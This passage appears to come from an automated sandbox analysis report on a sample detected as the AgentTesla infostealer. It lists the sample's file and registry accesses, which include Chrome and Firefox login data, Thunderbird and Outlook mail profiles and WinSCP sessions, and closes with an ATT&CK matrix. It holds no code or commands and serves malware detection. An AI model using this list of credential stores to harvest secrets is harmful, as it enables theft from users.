          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Users\user\Desktop\Q4YODvoYjL.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7F610 GetUserNameW,1_2_00D7F610

          Stealing of Sensitive Information

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: Yara matchFile source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation          		Path Interception111
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		111
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Exfiltration Over Alternative Protocol          		11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		1
          Credentials in Registry          		131
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth1
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Application Window Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration1
          Ingress Tool Transfer          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
          Process Injection          		NTDS1
          Account Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          System Owner/User Discovery          		SSHKeyloggingData Transfer Size Limits23
          Application Layer Protocol          		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Software Packing          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem114
          System Information Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
